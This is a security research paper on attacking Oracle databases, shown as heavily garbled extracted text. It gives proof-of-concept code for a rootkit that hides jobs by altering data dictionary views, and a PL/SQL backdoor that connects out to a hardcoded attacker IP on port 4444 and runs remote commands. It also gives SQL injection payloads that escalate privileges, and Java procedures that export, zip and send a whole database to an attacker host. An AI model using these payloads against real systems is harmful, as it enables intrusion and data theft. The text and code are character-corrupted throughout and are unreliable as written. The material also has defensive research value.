Hack

Hacking Databases for
Owning your Data
Author:
Cesar Cerrudo
(cesar>.at.<argeniss>.dot.<com)
Esteban Martinez Fayo
(esteban>.at.<argeniss>.dot.<com)
Argeniss – Information Security
Abstract:
Data theft is becoming a major threat, criminals have identified where the money is. In the
last years many databases from fortune 500 comanies were comromised causing lots of
money losses. !his aer will discuss the data theft roblem focusing on database attac"s, we
will show actual information about how serious the data theft roblem is, we will e#lain why
you should care about database security and common attac"s will be described, the main art
of the aer will be the demonstration of un"nown and not well "nown attac"s that can be
used or are being used by criminals to easily steal data from your databases, we will focus on
most used database servers$ %S S&' Server and (racle Database, it will be showed how to
steal a comlete database from Internet, how to steal data using a database root"it and
bac"door and some advanced database 0day e#loits. )e will demonstrate that comromising
databases is not big deal if they haven*t been roerly secured. Also it will be discussed how to
rotect against attac"s so you can imrove database security at your site.
Introduction:
+,y one estimate, 5- million eole have had data about themselves e#osed over the ast .-
months/ 0 Information)ee", 0-12012003 4.5
!hat is old news, right now the number of eole that have had their data e#osed is more
than .00 million6
!his is just starting, attac"s will increase in number and sohistication.
In the ne#t image you can see the !o .0 7ustomer Data0'oss Incidents as of %arch 2003$
If you want to be more scared just ta"e a loo" at$
htt$11www.rivacyrights.org1ar17hronData,reaches.htm
020 www.argeniss.com
Argeniss – Information Security
!here, a chronology of data breaches is "et u to date by 8rivacy 9ights 7learinghouse 425.
!hese data breaches not only rejudice eole that has their data comromised, the biggest
damage is caused to the comany affected by the breach, in order to illustrate this let*s see
some estimated money loses of some comanies that didn*t ta"e care of the data$
● 7hoice8oint$ :.5 million
● ,.;.*s )holesale$ :.0 million
● Ac#iom$ :<50,000
● 8rovidence =ealth System$ :> million
!hose numbers sea" by themselves.
Data about eole has more value than eole thin", let*s see and estimation of how much
ersonal data worth ?(en mar"et ricing of ersonal data from Swie !ool"it 4-5@ $
Aou can see why cyber criminals are going for your data, of course on blac" mar"et the rices
won*t be the same ?maybe yes@, but 20B of these rices multilied by let*s say .00,000
records it*s good money for a oint and clic" few minutes job ?hac"@.
Why database security:
Aou must care about database security because databases are where your most valuable data
rest$
● 7ororate data.
● 7ustomer data.
● Cinancial data.
● Dtc.
)hen your databases sto wor"ing your comany stos wor"ing too, try to do a Euic"
030 www.argeniss.com
Argeniss – Information Security
estimation about how much money you will lose if your databases sto wor"ing for a coule of
hours, for a day, a wee", etc. instantly you will realiFe that your databases are the most
imortant thing in your comany. I was tal"ing about databases sto wor"ing without
mentioning a reason, what about if your databases get hac"ed, then your comany can lose
millions, in worst case it can run out of business.
Aou must comly with regulations, laws, etc.$
● Sarbanes (#ley ?S(G@.
● 8ayment 7ard Industry ?87I@ Data Security Standard.
● =ealthcare Services ?=I8AA@ .
● Cinancial Services ?H',A@ .
● 7alifornia Senate ,ill Io. .-<3 .
● Data Accountability and !rust Act ?DA!A@.
● Dtc.
And that list gets bigger every day, but comlying with regulations and laws is not our toic
right now, it*s deserves another aer.
Database vulnerabilities affect all database vendors, I "now it*s old news but guess whatJ it*s
still a big issue, some vendors as our loved (racle ?D,2 doesn*t seem much better66@ are more
affected than others. Cor instance, on 2003 (racle released K 7ritical 8atch Ldates related
with database server, more than 20 remote ?no authentication reEuired@ vulnerabilities were
fi#ed, but that*s not the worst new, currently there are more than 50 vulnerabilities that are
still un0atched on (racle Database, so no matter if your database servers are u to date with
atches they still can be easily hac"ed.
!o give an idea of how buggy are database servers let me Euic"ly mention how many 0days
Argeniss currently has$
● D,2$ <
● Informi#$ 2
● (racle$ M50
Iowadays erimeter defense is strong and secure but that*s not enough, databases have many
entry oints such as web alications, internal networ"s, artners networ"s, etc. Any regular
database user can hac" a database if it*s not roerly monitored. Io matter if oerating
systems and networ"s are roerly secured, databases still could$ be mis0configured, have
wea" asswords, be vulnerable to un"nown and "nown vulnerabilities, etc.
How databases are hacked:
It*s imortant to mention how databases are hac"ed, having this in mind hels you to better
rotect them. 'et*s enumerate some common attac"s.
Password guessing/brute-forcing:
If asswords are blan" or not strong they can be easily guessed1brute0forced. After a valid
user account is found is easy to comlete comromise the database, esecially if the database
is (racle.
Passwords and data sniffed over the network:
If encrytion is not used, asswords and data can be easily sniffed.
Ex!oiting mis-configurations:
Some database servers are oen by default. 'ots of functionality enabled and most of the time
insecurely configured.
040 www.argeniss.com
Argeniss – Information Security
"e!ivering a #ro$an:
!his is not a common database server attac" but it*s something we are researching and the
results are scary, soon we will have one beautiful beast ready, maybe on ne#t aer you will
"now it.
A trojan can be delivered by email, 2, I%, 7D, DND, en drive, etc. (nce it gets e#ecuted on
a des"to comuter by a comany emloyee, it will get database servers and users
information in an automatic and stealth way using (D,7, ('DD,, ;D,7 configured
connections, sniffing, etc. )hen enough information is collected the trojan can connect to
database servers, it could try default accounts if necessary. After a successful login it will be
ready to steal data, it could run a 0day to elevate rivileges to own the comlete database
server and also install a database root"it to hide its actions. All the revious stes will be
reeated on every database server found. !he trojan can send the stolen data encryted bac"
to attac"er by email, =!!8, covert channel, etc.
Ex!oiting known/unknown vu!nerabi!ities:
Attac"ers can e#loit buffer overflows, S&' Injection, etc. in order to own the database server.
!he attac" could be through a web alication by e#loiting S&' Injection so no authentication
is needed. In this way databases can be hac"ed from Internet and firewalls are comlete
byassed. !his is one of the easiest and referred method that criminals use to steal sensitive
information such as credit cards, social security numbers, customer information, etc.
%tea!ing disks and backu taes:
!his is something that is not commonly mentioned, comanies always say that dis"s or
bac"us were lost $@
If data files and bac"ed u data are not encryted, once stolen data can be easily
comromised.
&nsta!!ing a rootkit/backdoor:
,y installing a root"it actions and database objects can be hidden so administrators won*t
notice someone hac"ed the database and continues having access. A database bac"door can
be used, designed to steal data and send it to attac"er and1or to give the attac"er stealth and
unrestricted access at any given time.
Orac!e Database attacks:
Iow letOs see some attac"s for (racle databases.
%tea!ing data using a rootkit and backdoor:
!o steal data from a database the best otion seems to be the combination of a database
root"it and a database bac"door. !his will allow an attac"er to administer a database from a
remote location and to be hidden from the D,A.
'rac!e "atabase (ootkits:
A root"it is a set of tools used by an attac"er after hac"ing a comuter system that hides
logins, rocesses, etc. It is commonly used to hide the oeration of an attac"er in a
comromised system. 9oot"its are more widesread in (erating Systems but the idea is
alicable to databases too.
!here are different ways to imlement root"its in (racle databases, for more information see
4P5.
!his aer shows an e#amle of a root"it that modifies data dictionary views to hide the
attac"er activity.
'rac!e "atabase )ackdoors:
!his "ind of bac"doors allows attac"ers to e#ecute commands and Eueries on the database
050 www.argeniss.com
Argeniss – Information Security
from a remote location and get the resonses from the server.
Attac"ers donOt want to be visible to database administrators, so bac"doors can be used in
combination with root"its to hide the bac"door oerations from the D,A.
&m!ementing an 'rac!e "atabase )ackdoor:
!o imlement an (racle Database ,ac"door an attac"er can write a rogram in 8'1S&', ;ava
or a combination of both.
!his rogram will do basically three things$
• Lse built0in networ" functionality to oen a connection to the attac"erOs host.
• 9ead the connection and e#ecute the commands the attac"er sends.
• )rite to the oened connection the outut of the commands.
!his rogram ?the bac"door@ can be scheduled, using the ;ob functionality, to run eriodically,
so if the connection is lost or the database instance is restarted, the attac"er will get
connected at a later time.
In order to avoid detection, the communication between the bac"door and the attac"erOs host
can be encryted or encoded in some way that is not detected by an IDS or I8S and that is not
understandable to someone that is loo"ing at the networ" traffic.
Proof-of-concet exam!e of a )ackdoor and (ootkit:
!his e#amle consists of two arts. (ne art are the 8'1S&' scrits that needs to be run on
the (racle Database server with administrator rivileges ?the attac"er will have to run these
scrits using an e#loit to elevate rivileges or get administrative access to the server@ and the
other art is the ,ac"door 7onsole.
)ackdoor *onso!e:
!he ,ac"door 7onsole is a HLI alication that the attac"er runs on his1her comuter. It
allows the attac"er to$
• Send commands to the ,ac"door and receive the outut.
• Niew information about the deloyed ,ac"door.
• 7onfigure the ,ac"door.
• %anage multile ,ac"doors.
*ommunication between the )ackdoor and the )ackdoor *onso!e:
!he ,ac"door installed in the database server and the ,ac"door 7onsole that is running on the
attac"erOs host use !781I8 to communicate. !he ,ac"door 7onsole listens on a redefined !78
ort ?KKKK@ waiting for connections from the database server ,ac"door.
)hen the ,ac"door starts, it oens an outgoing !78 connection to a redefined host and ort
where the ,ac"door 7onsole is listening. !he first message that the ,ac"door sends, contains
information about the owned database$ Database Server tye ?(racle, S&' Server@, Nersion,
Database name and Database ID.
060 www.argeniss.com
Argeniss – Information Security
"ackdoor Conso!e screenshot
!hen the ,ac"door enters a loo reeating these oerations$
• 9eads from the !781I8 connection and e#ecutes the commands it receives from the
,ac"door 7onsole.
• Sends the outut to the ,ac"door 7onsole.
• Sends an +44DnD55/ string meaning there is no more outut for the command.
It loos until the +DGI!/ command is received. )hen the ,ac"door receives the DGI!
command, it closes the !78 connection.
Backdoor Console
Listen on TCP Port
Shows new owned DB
Send command
Show output
Send Info about owned DB
Execute command
Send Output
Attacker host (remote)
Oracle Database
Server
Loop until “EIT!
is recei"ed
Co##unication between the "ackdoor Conso!e and the "ackdoor insta!!ed in the database
070 www.argeniss.com
Argeniss – Information Security
P+/%,+ %crits:
!hese are 8'1S&' scrits that will install ?or uninstall@ the root"it and the bac"door in an
(racle database.
'rac!e(ootkit.s-!:
!his scrit creates a function that modifies the data dictionary views D,AQ;(,S,
D,AQ;(,SQ9LIIIIH, RL:Q;(,QNID) to hide the bac"door job.
!he function can be injected in any S&' Injection vulnerability where a function call can be
injected as is the case of many S&' Injection vulnerabilities recently found in (racle software.
,elow is the scrit that installs the bac"door. !he original views are altered to add a condition
in the )=D9D clause so the bac"door job is not returned. In red you can see what is added to
the original view definition.
CREATE OR REPLACE
FUNCTION ins_rootkit RETURN VARCHAR2 AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE CREATE OR REPLACE FORCE VIE! "S#S"$"DBA_%OBS" &"%OB"'
"LOG_USER"' "PRIV_USER"' "SCHEMA_USER"' "LAST_DATE"' "LAST_SEC"' "THIS_DATE"'
"THIS_SEC"' "NEXT_DATE"' "NEXT_SEC"' "TOTAL_TIME"' "BRO(EN"' "INTERVAL"'
"FAILURES"' "!HAT"' "NLS_ENV"' "MISC_ENV"' "INSTANCE") AS
s*+*,t %OB' +o-n*r LOG_USER' .o-n*r PRIV_USER' ,o-n*r SCHEMA_USER'
LAST_DATE' s/0str&to_,12r&+2st_32t*'HH245MI5SS)'6'7) LAST_SEC'
THIS_DATE' s/0str&to_,12r&t1is_32t*'HH245MI5SS)'6'7) THIS_SEC'
NEXT_DATE' s/0str&to_,12r&n*8t_32t*'HH245MI5SS)'6'7) NEXT_SEC'
&tot2+9&s:s32t*;n<+&t1is_32t*'s:s32t*)))=7>4?? TOTAL_TIME'
3*,o3*&@o3&FLAG'2)'6'#'?'N'A) BRO(EN'
INTERVALB int*r<2+' FAILURES' !HAT'
n+s*n< NLS_ENV' *n< MISC_ENV' C$Di*+36 INSTANCE
Dro@ s:s$Co0E C !HERE C$-12t not +ik* DECLARE +_,n UTL_TCP$CONNECTION;F;
EXECUTE IMMEDIATE CREATE OR REPLACE FORCE VIE! "S#S"$"DBA_%OBS_RUNNING"
&"SID"' "%OB"' "FAILURES"' "LAST_DATE"' "LAST_SEC"' "THIS_DATE"' "THIS_SEC"'
"INSTANCE") AS
s*+*,t <$SID' <$i32 %OB' C$FAILURES'
LAST_DATE' s/0str&to_,12r&+2st_32t*'HH245MI5SS)'6'7) LAST_SEC'
THIS_DATE' s/0str&to_,12r&t1is_32t*'HH245MI5SS)'6'7) THIS_SEC'
C$Di*+36 INSTANCE
Dro@ s:s$Co0E C' <E+o,k <
-1*r* <$t:.* G %H 2n3 C$Co0 &9)G <$i32 2n3 C$-12t not +ik* DECLARE +_,n
UTL_TCP$CONNECTION;F;
EXECUTE IMMEDIATE CREATE OR REPLACE FORCE VIE! "S#S"$"(UE_%OB_VIE!" OF
"S#S"$"(UE_%OB_T"
!ITH OB%ECT IDENTIFIER &.o-n*r_i3) AS
s*+*,t 6'?'
/$/s*rB' C$.o-n*r' C$+o-n*r' C$,o-n*r' C$Co0'
TO_CHAR&C$+2st_32t*' ####;MM;DD5HH245MI5SS)'
TO_CHAR&C$t1is_32t*' ####;MM;DD5HH245MI5SS)'
TO_CHAR&C$n*8t_32t*' ####;MM;DD5HH245MI5SS)'
C$D+2I' C$D2i+/r*s'
REPLACE&C$int*r<2+B' ' )'
REPLACE&C$-12t' ' )'
REPLACE&C$n+s*n<' ' )'
C$*n<' C$Di*+36' C$,12r*n<
Dro@ s:s$Co0E C' s:s$/s*rE /
-1*r* C$.o-n*r G /$n2@* 2n3 C$-12t not +ik* DECLARE +_,n
UTL_TCP$CONNECTION;F;
080 www.argeniss.com
Argeniss – Information Security
COMMIT;
RETURN ;
END;
'rac!e)ackdoor.s-!:
!his scrit creates a function that submits a job that reads commands from the attac"er host,
e#ecutes them and sends the command outut bac" to the attac"er.
!his is the scrit contents with comments in green$
7reate a function named insQbac"door that e#ecutes as the calling user and is defined as an
autonomous transaction. !hese characteristics are reEuired so this function can then be used
in a S&' injection e#loit.
CREATE OR REPLACE
FUNCTION ins_02,k3oor RETURN VARCHAR2 AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
Co0_i3 NUMBER;
BEGIN
Submit a database job using the job functionality in D,%SQ;(,. Cor the !781I8 communication
with the ,ac"door 7onsole it uses the L!'Q!78 (racle standard ac"age.
DBMS_%OB$SUBMIT&Co0_i3' DECLARE +_,n UTL_TCP$CONNECTION;
+_r*t_<2+ PLS_INTEGER;
+_sJ+st@ VARCHAR2&K2???);
+_t1*,/rsor INTEGER;
+_,o+/@n<2+/* VARCHAR2&2???);
+_st2t/s INTEGER;
+_,o+,nt NUMBER DEFAULT ?;
+_3*s,_t DBMS_SHL$DESC_TAB;
BEGIN
(en a connection to the attac"er host where the ,ac"door 7onsole is running. In this scrit it
is hardcoded to .>2..3<.25-.. and the !78 ort is KKKK. Aou can change it to any other value.
+_,n 5G UTL_TCP$OPEN_CONNECTION&6L2$6>7$2MK$6' 4444' 6M26);
Het the information about the database and send it over the !78 connection as an G%'
document.
SELECT DBID' NAME INTO +_,o+,nt' +_sJ+st@ FROM VEDATABASE;
SELECT 02nn*r INTO +_,o+/@n<2+/* FROM VEVERSION !HERE RO!NUM G 6;
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' NA8@+ <*rsionG"6$?" *n,o3inIG"/tD;7" A
ONIn,o@@inIConn 8@+nsG"1tt.5PPt*@./ri$orIPIn,o@inIB2,k3oorConn$8s3"
DBT:.*G"Or2,+*" S*r<*rV*rsionG" QQ +_,o+/@n<2+/* QQ " DBN2@*G" QQ +_sJ+st@
QQ " DBIDG" QQ +_,o+,nt QQ "PO);
LOOP
+_sJ+st@ 5G UTL_TCP$GET_LINE&+_,n' TRUE);
EXIT !HEN UPPER&+_sJ+st@) G EXIT;
BEGIN
+_t1*,/rsor 5G DBMS_SHL$OPEN_CURSOR;

If the received S&' command is a SD'D7! it will first get all the column names and send them
so the ,ac"door 7onsole dislays them as the column headers in a grid.
IF&SUBSTR&LTRIM&UPPER&+_sJ+st@))' 6' R)) G SELECT THEN
090 www.argeniss.com
Argeniss – Information Security
DBMS_SHL$PARSE&+_t1*,/rsor' +_sJ+st@' DBMS_SHL$NATIVE);
DBMS_SHL$DESCRIBE_COLUMNS&+_t1*,/rsor' +_,o+,nt' +_3*s,_t);
FOR i IN 6 $$ +_,o+,nt LOOP
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' QQ +_3*s,_t&i)$,o+_n2@*);
DBMS_SHL$DEFINE_COLUMN&+_t1*,/rsor' i' +_,o+/@n<2+/*' 2???);
END LOOP;
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' );

DBMS_SHL$DEFINE_COLUMN&+_t1*,/rsor' 6' +_,o+/@n<2+/*' 2???);
+_st2t/s 5G DBMS_SHL$EXECUTE&+_t1*,/rsor);
LOOP
EXIT !HEN&DBMS_SHL$FETCH_RO!S&+_t1*,/rsor) NG ?);
FOR i IN 6 $$ +_,o+,nt
LOOP
DBMS_SHL$COLUMN_VALUE&+_t1*,/rsor' i' +_,o+/@n<2+/*);
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' QQ +_,o+/@n<2+/*);
END LOOP;
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' );
END LOOP;
DBMS_SHL$CLOSE_CURSOR&+_t1*,/rsor);
ELSE
If the received S&' command is not a SD'D7! just e#ecute it using DGD7L!D I%%DDIA!D.
EXECUTE IMMEDIATE&+_sJ+st@);
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' PLPSHL s/,,*ssD/++:
,o@.+*t*3$);
END IF;
EXCEPTION
If there are any errors, send the descrition over the connection.
!HEN OTHERS THEN
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' ORACLE ERROR5 QQ sJ+*rr@);
END;
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' SSEnDTT);
END LOOP;
UTL_TCP$CLOSE_CONNECTION&+_,n);
END;
SASDA!D S .01<3K00 is the time when the job must start for the first time. It is .0 seconds
after the submission.
*SASDA!D S .1.KK0* means that the job will run again every one minute.
' S#SDATE 9 6?P7>4??' S#SDATE 9 6P644?);
COMMIT;
RETURN ;
END;
*!ean'rac!e)ackdoor.s-!:
!his scrit removes all the ,ac"door ;obs. !o do this it will search for all the Database ;obs
starting with *DD7'A9D 'Q7I L!'Q!78.7(IID7!I(IT* and remove them using
D,%SQ;(,.9D%(ND.
DECLARE
CURSOR +_,/r_Co0s IS
SELECT %OB FROM %OBE !HERE !HAT LI(E DECLARE +_,n UTL_TCP$CONNECTION;F;
+_r*, +_,/r_Co0s F ro-t:.*;
0100 www.argeniss.com
Argeniss – Information Security
BEGIN
OPEN +_,/r_Co0s;
LOOP
FETCH +_,/r_Co0s INTO +_r*,;
EXIT !HEN +_,/r_Co0s F NOTFOUND;
DBMS_%OB$REMOVE&+_r*,$Co0);
COMMIT;
END LOOP;
COMMIT;
END;
*!ean'rac!e(ootkit.s-!:
9estores the jobs data dictionary views to its original state.
ItOs similar to (racle9oot"it.sEl but without the conditions that were added to hide the
bac"door ?te#t in red@.
Executing these scrits as a "). user:
As discussed earlier, these scrits need to be run on the database server as a user with D,A
rivileges. In the revious section U=ow databases are hac"edJO we mention and described
some of the techniEues that attac"ers could use to achieve this.
.s a !ow rivi!ege user connected to the "atabase:
Cor this e#amle we will use a 8'1S&' injection vulnerability to elevate rivileges and e#ecute
the functions we just created with D,A rivileges.
!he vulnerability is in the 7=AIHDQSD! arameter of
D,%SQ7D7QSL,S79I,D.HD!QSL,S79I8!I(IQ=AID'D rocedure. !o e#loit this vulnerability
we can e#ecute this$
DECLARE
P_CHANGE_SET VARCHAR2&K2R>R);
P_DESCRIPTION VARCHAR2&K2R>R);
P_SUBSCRIPTION_HANDLE NUMBER;
BEGIN
P_CHANGE_SET 5G QQSCOTT$ins_rootkit&)QQ;
P_DESCRIPTION 5G AA;
P_SUBSCRIPTION_HANDLE 5G 6;
S#S$DBMS_CDC_SUBSCRIBE$GET_SUBSCRIPTION_HANDLE&P_CHANGE_SET' P_DESCRIPTION'
P_SUBSCRIPTION_HANDLE);
END;
!o install the bac"door just change insQroot"it for insQbac"door.
.s a web a!ication user:
Lsing a web alication vulnerable to S&' injection, an attac"er can still install a 9oot"it and a
,ac"door even if he doesnOt have direct access to the Database Server.
!he file !ableDmSearch.as is an e#amle of a web age that is vulnerable to S&' injection
attac"s ?the Search arameter is vulnerable@. !he vulnerability allows a malicious web user to
inject a function call. !his function will get e#ecuted as the web alication database user.
Iow we will see that there is a built0in function in (racle that will hel e#loit this web
alication vulnerability.
")/%01/+,2E(3.4E#1/+:
!here is a function ?available since (racle >i 9elease .@ called HD!G%' in ac"age
D,%SQG%'&LD9A that e#ecutes a Euery and returns the result in G%' format. ,y default it
has DGD7L!D rivilege granted to 8L,'I7. !he interesting art is that it allows to e#ecute
anonymous 8'1S&' bloc"s and creating an autonomous transaction e#ecutes not only Eueries
0110 www.argeniss.com
Argeniss – Information Security
but also D%' and DD' statements. Io rivilege elevation e#ists here, but this can be used to
e#loit more easily the many S&' Injection vulnerabilities that reEuire a function to be created
and also to easily e#loit a S&' injection in a web alication with an (racle Database
bac"end.
!o e#ecute 8'1S&' bloc"s as the web database user an attac"er can submit this in the Search
arameter of the web age$
QQ30@s_8@+J/*r:$I*tX@+&3*,+2r* PRAGMA AUTONOMOUS_TRANSACTION; 0*Iin *8*,/t*
i@@*3i2t* AN# PLPSHL BLOC( ; ,o@@it; *n3; ' ?)QQ
!his results in the ne#t 8'1S&' being e#ecuted by the web database user$
SELECT EMPNO' ENAME' %OB FROM SCOTT$EMP !HERE ENAME LI(E QQ
30@s_8@+J/*r:$I*tX@+&3*,+2r* PRAGMA AUTONOMOUS_TRANSACTION; 0*Iin *8*,/t*
i@@*3i2t* AN# PLPSHL BLOC( ; ,o@@it; *n3; ' ?)QQF
)e will assume that the web database user doesnOt have D,A rivileges but the 79DA!D
89(7DDL9D rivilege. So we will create a function that installs the bac"door and later we will
e#loit a S&' injection vulnerability in one of the (racle ac"ages to e#ecute this function as
SAS.
!o create the function to install the ,ac"door ;ob an attac"er can send this to the web age
arameter vulnerable to S&' injection$
QQ30@s_8@+J/*r:$I*tX@+& 3*,+2r* PRAGMA AUTONOMOUS_TRANSACTION; 0*Iin
*8*,/t* i@@*3i2t* CREATE OR REPLACE FUNCTION ins_02,k3oor RETURN VARCHAR2
AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; Co0_i3 NUMBER;
+_,o/nt NUMBER; BEGIN *8*,/t* i@@*3i2t* SELECT COUNT&=) FROM %OBE !HERE
!HAT LI(E DECLARE +_,n UTL_TCP$CONNECTION;F INTO L_COUNT; iD
+_,o/nt G ? t1*n DBMS_%OB$SUBMIT&Co0_i3' DECLARE +_,n UTL_TCP$CONNECTION;
+_r*t_<2+ PLS_INTEGER; +_sJ+st@ VARCHAR2&K2???); +_t1*,/rsor INTEGER;
+_,o+/@n<2+/* VARCHAR2&2???); +_st2t/s INTEGER; +_,o+,nt NUMBER DEFAULT ?;
+_3*s,_t DBMS_SHL$DESC_TAB; BEGIN +_,n 5G
UTL_TCP$OPEN_CONNECTION&6L2$6>7$2MK$6' 4444' 6M26); SELECT
DBID' NAME INTO +_,o+,nt' +_sJ+st@ FROM VEDATABASE; SELECT 02nn*r INTO
+_,o+/@n<2+/* FROM VEVERSION !HERE RO!NUM G 6; +_r*t_<2+ 5G
UTL_TCP$!RITE_LINE&+_,n' NA8@+ <*rsionG"6$?" *n,o3inIG"/tD;7" A
ONIn,o@@inIConn 8@+nsG"1tt.5PPt*@./ri$orIPIn,o@inIB2,k3oorConn$8s3"
DBT:.*G"Or2,+*" S*r<*rV*rsionG" QQ +_,o+/@n<2+/* QQ "
DBN2@*G" QQ +_sJ+st@ QQ " DBIDG" QQ +_,o+,nt QQ
"PO); LOOP +_sJ+st@ 5G UTL_TCP$GET_LINE&+_,n' TRUE);
EXIT !HEN UPPER&+_sJ+st@) G EXIT; BEGIN +_t1*,/rsor 5G
DBMS_SHL$OPEN_CURSOR; IF&SUBSTR&LTRIM&UPPER&+_sJ+st@))' 6' R)) G
SELECT THEN DBMS_SHL$PARSE&+_t1*,/rsor' +_sJ+st@'
DBMS_SHL$NATIVE); DBMS_SHL$DESCRIBE_COLUMNS&+_t1*,/rsor' +_,o+,nt'
+_3*s,_t); FOR i IN 6 $$ +_,o+,nt LOOP +_r*t_<2+ 5G
UTL_TCP$!RITE_LINE&+_,n' QQ +_3*s,_t&i)$,o+_n2@*);
DBMS_SHL$DEFINE_COLUMN&+_t1*,/rsor' i' +_,o+/@n<2+/*' 2???); END LOOP;
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' );
DBMS_SHL$DEFINE_COLUMN&+_t1*,/rsor' 6' +_,o+/@n<2+/*' 2???); +_st2t/s 5G
DBMS_SHL$EXECUTE&+_t1*,/rsor); LOOP EXIT
!HEN&DBMS_SHL$FETCH_RO!S&+_t1*,/rsor) NG ?); FOR i IN 6 $$ +_,o+,nt
LOOP DBMS_SHL$COLUMN_VALUE&+_t1*,/rsor' i' +_,o+/@n<2+/*);
+_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' QQ +_,o+/@n<2+/*);
END LOOP; +_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' );
END LOOP; DBMS_SHL$CLOSE_CURSOR&+_t1*,/rsor); ELSE EXECUTE
IMMEDIATE&+_sJ+st@); +_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n'
PLPSHL s/,,*ssD/++: ,o@.+*t*3$); END IF; EXCEPTION
!HEN OTHERS THEN +_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n' ORACLE
ERROR5 QQ sJ+*rr@); END; +_r*t_<2+ 5G UTL_TCP$!RITE_LINE&+_,n'
SSEnDTT); END LOOP; UTL_TCP$CLOSE_CONNECTION&+_,n); END;
' S#SDATE 9 6?P7>4??' S#SDATE 9 6P644?); *n3 iD; COMMIT; r*t/rn
; END;; ,o@@it; *n3; ' ? )QQ
0120 www.argeniss.com
Argeniss – Information Security
!he bac"door job is not created yet. !o create it the attac"er needs to e#ecute the function
insQbac"door that have just created as a D,A user. !o do this the attac"er can send this
e#loit to the web alication vulnerable arameter$
QQS#S$DBMS_METADATA$GET_DDL&AA QQ s,ott$ins_02,k3oor QQ ')QQ
It e#loits an (racle vulnerability in SAS.D,%SQ%D!ADA!A.HD!QDD' ?see 4<5 and 4>5@ to
e#ecute the function scott.insQbac"door under the SAS user security conte#t.
In a similar way that the bac"door was installed the root"it can also be installed using a web
alication vulnerable to S&' injection.
%tea!ing a com!ete database from &nternet:
!his is a very simle e#amle of how a comlete (racle database can be stolen from the
Internet using an e#loit or a bac"door. !he database contents are sent comressed using an
outgoing connection initiated from the (racle database server host to the attac"er host.
!his e#amle consists of two scrits that needs to be run after the database has been
comromised ?reEuire D,A rivilege@. !he scrits wor" on all latforms where (racle runs.
!here are two different versions of the scrits one for Vni# and another for )indows, being the
only difference between them the ath locations for files and directories.
exort0and05i.s-!:
In this scrit we create two stored rocedures using the ;ava functionality rovided by (racle
to get access to the (erating System.
CREATE OR REPLACE AND RESOLVE %AVA SOURCE NAMED "SRC_EXECUTEOS" AS
[email protected] C2<2$+2nI$=;
[email protected] C2<2$io$=;
./0+i, ,+2ss E8*,/t*OS
U
!his ;ava function creates a te#t file that will be used to call the (racle e# utility to e#ort all
the database contents to a file.
8arameters$
arfile$ Cile name for the te#t arameter file that will be created.
e#ort$ Cile name for the e#orted file.
./0+i, st2ti, <oi3 ,r*2t*P2rDi+* &StrinI .2rDi+*' StrinI *8.ort) t1ro-s
IOE8,*.tion
U
Fi+* Di+*O/t G n*- Fi+* &.2rDi+*);
Fi+*!rit*r D- G n*- Fi+*!rit*r &Di+*O/t);
D-$-rit*&"D/++G:Vn");
D-$-rit*&"/s*ri3GV"P 2s s:s302V"Vn");
D-$-rit*&"Di+*G" 9 *8.ort 9 "Vn");
D-$,+os*&);
W
!his ;ava function e#ecutes as an (S command the string cmd assed as a arameter.
./0+i, st2ti, <oi3 *8*,OSC@3 &StrinI ,@3) t1ro-s IOE8,*.tion'
C2<2$+2nI$Int*rr/.t*3E8,*.tion
U
Pro,*ss . G R/nti@*$I*tR/nti@*&)$*8*,&,@3);
0130 www.argeniss.com
Argeniss – Information Security
.$-2itFor&);
W
W;
CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" &._,o@@2n3 <2r,12r2)
AS LANGUAGE %AVA
NAME E8*,/t*OS$*8*,OSC@3 &C2<2$+2nI$StrinI);
CREATE OR REPLACE PROCEDURE "PROC_CREATEPARFILE" &._.2rDi+* <2r,12r2' ._*8.ort
<2r,12r2)
AS LANGUAGE %AVA
NAME E8*,/t*OS$,r*2t*P2rDi+* &C2<2$+2nI$StrinI' C2<2$+2nI$StrinI);
D#ecute the ;ava stored rocedures to$ 7reate a arameter file for e# utility, 9un the e#
utility to e#ort the database and 7omress the e#orted file with a Wi utility.
8ath locations are different so we have two versions one for )indow and another for Vni#
;; !in3o-s
BEGIN
PROC_CREATEPARFILE&C5V.2rDi+*$t8t' ,5V*8.ort$3@.);
PROC_EXECUTEOS &*8. .2rDi+*GC5V.2rDi+*$t8t);
PROC_EXECUTEOS &Xi. ,5V*8.ort$Xi. ,5V*8.ort$3@.);
END;
;; =ni8
BEGIN
PROC_CREATEPARFILE&.2rDi+*$t8t' *8.ort$3@.);
PROC_EXECUTEOS &$$P0inP*8. .2rDi+*G$$P.2rDi+*$t8t);
PROC_EXECUTEOS &P/srP0inPXi. *8.ort$Xi. *8.ort$3@.);
END;
So, this scrit creates an e#ort file in the server host, containing all the data in the database
comressed in Wi format. Iow we need to send the file over the networ" to the attac"er host.
send05i.s-!:
!his scrit uses the ;ava functionality available in (racle Database Server to oen an outgoing
!78 connection from the database server to the attac"er remote host at a given !78 ort
number. (nce this connection is oened, the scrit sends all the contents in the e#orted Wi
file over this connection.
CREATE OR REPLACE AND RESOLVE %AVA SOURCE NAMED "SRC_FILESEND" AS
[email protected] C2<2$+2nI$=;
[email protected] C2<2$io$=;
[email protected] C2<2$n*t$=;
./0+i, ,+2ss Fi+*S*n3
U
!his ;ava function uses the networ" functionality in java.net.V to send a local file over a !781I8
connection to a remote site.
./0+i, st2ti, <oi3 Di+*S*n3&StrinI @:Fi+*' StrinI 1ost' int .ort) t1ro-s
E8,*.tion
U
int +*nIt1;
0:t* 0/DD*rST G n*- 0:t*S6?24T;
0140 www.argeniss.com
Argeniss – Information Security
